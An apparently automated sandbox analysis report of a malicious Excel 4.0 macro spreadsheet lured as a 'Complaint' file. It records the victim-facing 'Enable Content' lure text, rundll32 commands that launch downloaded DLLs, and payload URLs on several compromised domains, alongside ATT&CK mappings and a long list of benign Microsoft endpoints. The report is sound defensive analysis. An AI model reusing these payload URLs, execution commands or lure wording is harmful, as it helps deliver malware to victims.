    Source: 4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drString found in binary or memory: https://wus2-000.contentsync.
    Source: 4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drString found in binary or memory: https://wus2-000.pagecontentsync.
    Source: 4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
    Source: 4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drString found in binary or memory: https://www.odwebp.svc.ms
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
    Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
    Source: unknownHTTPS traffic detected: 138.36.237.100:443 -> 192.168.2.4:49737 version: TLS 1.2

    System Summary:

    barindex
    Found malicious Excel 4.0 MacroShow sources
    Source: Complaint-447781983-02182021.xlsInitial sample: urlmon
    Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
    Source: Screenshot number: 4Screenshot OCR: Enable Editing 11 from the yellow bar above r ,nDLL x "p 12 Rl nDLL X 't 13 @Once You have Ena
    Source: Screenshot number: 8Screenshot OCR: Enable Editing, please click Enable Co R,, ,dll 1\ i ,' 14_ from the yellow bar above RunDLL x )
    Source: Screenshot number: 12Screenshot OCR: Enable Editing, please click Enable Content 14_ from the yellow bar above 15 16 17 ,, WHY I CAN
    Source: Screenshot number: 12Screenshot OCR: Enable Content 14_ from the yellow bar above 15 16 17 ,, WHY I CANNOT OPEN THIS DOCUMENT? 19
    Source: Document image extraction number: 2Screenshot OCR: Enable Editing from the yellow bar above Once You have Enable Editing, please click Enable Content
    Source: Document image extraction number: 2Screenshot OCR: Enable Content from the yellow bar above WHYICANNOTOPEN THIS DOCUMENT? You are using iOS or Andro
    Source: Document image extraction number: 8Screenshot OCR: Enable Editing from the yellow bar above @Once You have Enable Editing, please click Enable Conten
    Source: Document image extraction number: 8Screenshot OCR: Enable Content from the yellow bar above WHYICANNOTOPEN THIS DOCUMENT? m You are using IDS or And
    Found Excel 4.0 Macro with suspicious formulasShow sources
    Source: Complaint-447781983-02182021.xlsInitial sample: EXEC
    Source: Complaint-447781983-02182021.xlsOLE indicator, VBA macros: true
    Source: Complaint-447781983-02182021.xls, type: SAMPLEMatched rule: SUSP_EnableContent_String_Gen date = 2019-02-12, hash1 = 525ba2c8d35f6972ac8fcec8081ae35f6fe8119500be20a4113900fe57d6a0de, author = Florian Roth, description = Detects suspicious string that asks to enable active content in Office Doc, reference = Internal Research
    Source: classification engineClassification label: mal100.expl.evad.winXLS@11/9@4/4
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCacheJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\{0BC941FB-D386-4AC7-8EE1-FDDF056384D3} - OProcSessId.datJump to behavior
    Source: Complaint-447781983-02182021.xlsOLE indicator, Workbook stream: true
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
    Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\JDFR.hdfgr,DllRegisterServer
    Source: Complaint-447781983-02182021.xlsVirustotal: Detection: 31%
    Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
    Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\JDFR.hdfgr,DllRegisterServer
    Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\JDFR.hdfgr1,DllRegisterServer
    Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\JDFR.hdfgr2,DllRegisterServer
    Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\JDFR.hdfgr3,DllRegisterServer
    Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\JDFR.hdfgr4,DllRegisterServer
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\JDFR.hdfgr,DllRegisterServerJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\JDFR.hdfgr1,DllRegisterServerJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\JDFR.hdfgr2,DllRegisterServerJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\JDFR.hdfgr3,DllRegisterServerJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\JDFR.hdfgr4,DllRegisterServerJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
    Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
    Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
    Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
    Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
    Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguagesJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: rundll32.exe, 00000004.00000002.697908836.00000000011C0000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.693528349.0000000003330000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.723054670.0000000000E50000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.716781804.0000000004AD0000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.707576966.0000000000C00000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
    Source: rundll32.exe, 00000004.00000002.697908836.00000000011C0000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.693528349.0000000003330000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.723054670.0000000000E50000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.716781804.0000000004AD0000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.707576966.0000000000C00000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
    Source: rundll32.exe, 00000004.00000002.697908836.00000000011C0000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.693528349.0000000003330000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.723054670.0000000000E50000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.716781804.0000000004AD0000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.707576966.0000000000C00000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
    Source: rundll32.exe, 00000004.00000002.697908836.00000000011C0000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.693528349.0000000003330000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.723054670.0000000000E50000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.716781804.0000000004AD0000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.707576966.0000000000C00000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

    HIPS / PFW / Operating System Protection Evasion:

    barindex
    Yara detected hidden Macro 4.0 in ExcelShow sources
    Source: Yara matchFile source: Complaint-447781983-02182021.xls, type: SAMPLE

    Mitre Att&ck Matrix

    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid AccountsScripting21Path InterceptionProcess Injection1Masquerading1OS Credential DumpingSecurity Software Discovery1Remote ServicesData from Local SystemExfiltration Over Other Network MediumEncrypted Channel2Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
    Default AccountsExploitation for Client Execution23Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemoryFile and Directory Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothNon-Application Layer Protocol2Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Rundll321Security Account ManagerSystem Information Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationApplication Layer Protocol13Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection1NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled TransferIngress Tool Transfer1SIM Card SwapCarrier Billing Fraud
    Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptScripting21LSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.

    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    Complaint-447781983-02182021.xls31%VirustotalBrowse

    Dropped Files

    No Antivirus matches

    Unpacked PE Files

    No Antivirus matches

    Domains

    SourceDetectionScannerLabelLink
    rzminc.com1%VirustotalBrowse
    crt.sectigo.com0%VirustotalBrowse
    jugueterialatorre.com.ar4%VirustotalBrowse
    pathinanchilearthmovers.com8%VirustotalBrowse

    URLs

    SourceDetectionScannerLabelLink
    https://cdn.entity.0%URL Reputationsafe
    https://cdn.entity.0%URL Reputationsafe
    https://cdn.entity.0%URL Reputationsafe
    https://cdn.entity.0%URL Reputationsafe
    https://wus2-000.contentsync.0%URL Reputationsafe
    https://wus2-000.contentsync.0%URL Reputationsafe
    https://wus2-000.contentsync.0%URL Reputationsafe
    https://wus2-000.contentsync.0%URL Reputationsafe
    http://rzminc.com/fdzgprclatqo/44250601302777800000.dat0%Avira URL Cloudsafe
    https://powerlift.acompli.net0%URL Reputationsafe
    https://powerlift.acompli.net0%URL Reputationsafe
    https://powerlift.acompli.net0%URL Reputationsafe
    https://powerlift.acompli.net0%URL Reputationsafe
    https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
    https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
    https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
    https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
    https://cortana.ai0%URL Reputationsafe
    https://cortana.ai0%URL Reputationsafe
    https://cortana.ai0%URL Reputationsafe
    https://cortana.ai0%URL Reputationsafe
    http://pathinanchilearthmovers.com/eznwcdhx/44250601302777800000.dat100%Avira URL Cloudmalware
    https://api.aadrm.com/0%URL Reputationsafe
    https://api.aadrm.com/0%URL Reputationsafe
    https://api.aadrm.com/0%URL Reputationsafe
    https://ofcrecsvcapi-int.azurewebsites.net/0%Avira URL Cloudsafe
    https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
    https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
    https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
    https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
    https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
    https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
    https://officeci.azurewebsites.net/api/0%Avira URL Cloudsafe
    https://store.office.cn/addinstemplate0%URL Reputationsafe
    https://store.office.cn/addinstemplate0%URL Reputationsafe
    https://store.office.cn/addinstemplate0%URL Reputationsafe
    https://wus2-000.pagecontentsync.0%URL Reputationsafe
    https://wus2-000.pagecontentsync.0%URL Reputationsafe
    https://wus2-000.pagecontentsync.0%URL Reputationsafe
    https://store.officeppe.com/addinstemplate0%URL Reputationsafe
    https://store.officeppe.com/addinstemplate0%URL Reputationsafe
    https://store.officeppe.com/addinstemplate0%URL Reputationsafe
    http://jugueterialatorre.com.ar/xjzpfwc/44250601302777800000.dat0%Avira URL Cloudsafe
    https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
    https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
    https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
    https://www.odwebp.svc.ms0%URL Reputationsafe
    https://www.odwebp.svc.ms0%URL Reputationsafe
    https://www.odwebp.svc.ms0%URL Reputationsafe
    https://dataservice.o365filtering.com/0%URL Reputationsafe
    https://dataservice.o365filtering.com/0%URL Reputationsafe
    https://dataservice.o365filtering.com/0%URL Reputationsafe
    https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
    https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
    https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
    https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
    https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
    https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
    https://apis.live.net/v5.0/0%URL Reputationsafe
    https://apis.live.net/v5.0/0%URL Reputationsafe
    https://apis.live.net/v5.0/0%URL Reputationsafe
    https://asgsmsproxyapi.azurewebsites.net/0%Avira URL Cloudsafe
    https://ncus-000.contentsync.0%URL Reputationsafe
    https://ncus-000.contentsync.0%URL Reputationsafe
    https://ncus-000.contentsync.0%URL Reputationsafe
    https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
    https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
    https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
    https://skyapi.live.net/Activity/0%URL Reputationsafe
    https://skyapi.live.net/Activity/0%URL Reputationsafe
    https://skyapi.live.net/Activity/0%URL Reputationsafe
    http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0%URL Reputationsafe
    http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0%URL Reputationsafe
    http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0%URL Reputationsafe
    https://dataservice.o365filtering.com0%URL Reputationsafe
    https://dataservice.o365filtering.com0%URL Reputationsafe
    https://dataservice.o365filtering.com0%URL Reputationsafe
    https://api.cortana.ai0%URL Reputationsafe
    https://api.cortana.ai0%URL Reputationsafe
    https://api.cortana.ai0%URL Reputationsafe
    http://rzminc.com/xklyulyijvn/44250601302777800000.dat0%Avira URL Cloudsafe

    Domains and IPs

    Contacted Domains

    NameIPActiveMaliciousAntivirus DetectionReputation
    rzminc.com
    72.52.227.180
    truefalseunknown
    crt.sectigo.com
    91.199.212.52
    truefalseunknown
    jugueterialatorre.com.ar
    138.36.237.100
    truefalseunknown
    pathinanchilearthmovers.com
    162.241.80.6
    truetrueunknown

    Contacted URLs

    NameMaliciousAntivirus DetectionReputation
    http://rzminc.com/fdzgprclatqo/44250601302777800000.datfalse
    • Avira URL Cloud: safe
    unknown
    http://pathinanchilearthmovers.com/eznwcdhx/44250601302777800000.dattrue
    • Avira URL Cloud: malware
    unknown
    http://jugueterialatorre.com.ar/xjzpfwc/44250601302777800000.datfalse
    • Avira URL Cloud: safe
    unknown
    http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crtfalse
    • URL Reputation: safe
    • URL Reputation: safe
    • URL Reputation: safe
    unknown
    http://rzminc.com/xklyulyijvn/44250601302777800000.datfalse
    • Avira URL Cloud: safe
    unknown

    URLs from Memory and Binaries

    NameSourceMaliciousAntivirus DetectionReputation
    https://api.diagnosticssdf.office.com4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drfalse
      high
      https://login.microsoftonline.com/4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drfalse
        high
        https://shell.suite.office.com:14434C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drfalse
          high
          https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drfalse
            high
            https://autodiscover-s.outlook.com/4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drfalse
              high
              https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drfalse
                high
                https://cdn.entity.4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drfalse
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                unknown
                https://api.addins.omex.office.net/appinfo/query4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drfalse
                  high
                  https://wus2-000.contentsync.4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drfalse
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  unknown
                  https://clients.config.office.net/user/v1.0/tenantassociationkey4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drfalse
                    high
                    https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drfalse
                      high
                      https://powerlift.acompli.net4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      https://rpsticket.partnerservices.getmicrosoftkey.com4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      https://lookup.onenote.com/lookup/geolocation/v14C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drfalse
                        high
                        https://cortana.ai4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        unknown
                        https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drfalse
                          high
                          https://cloudfiles.onenote.com/upload.aspx4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drfalse
                            high
                            https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drfalse
                              high
                              https://entitlement.diagnosticssdf.office.com4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drfalse
                                high
                                https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drfalse
                                  high
                                  https://api.aadrm.com/4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  unknown
                                  https://ofcrecsvcapi-int.azurewebsites.net/4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drfalse
                                    high
                                    https://api.microsoftstream.com/api/4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drfalse
                                      high
                                      https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drfalse
                                        high
                                        https://cr.office.com4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drfalse
                                          high
                                          https://portal.office.com/account/?ref=ClientMeControl4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drfalse
                                            high
                                            https://ecs.office.com/config/v2/Office4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drfalse
                                              high
                                              https://graph.ppe.windows.net4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drfalse
                                                high
                                                https://res.getmicrosoftkey.com/api/redemptionevents4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                unknown
                                                https://powerlift-frontdesk.acompli.net4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                unknown
                                                https://tasks.office.com4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drfalse
                                                  high
                                                  https://officeci.azurewebsites.net/api/4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://sr.outlook.office.net/ws/speech/recognize/assistant/work4C99B3FD-0FAA-455B-8960-C99FC42FE1C8.0.drfalse
                                                    high
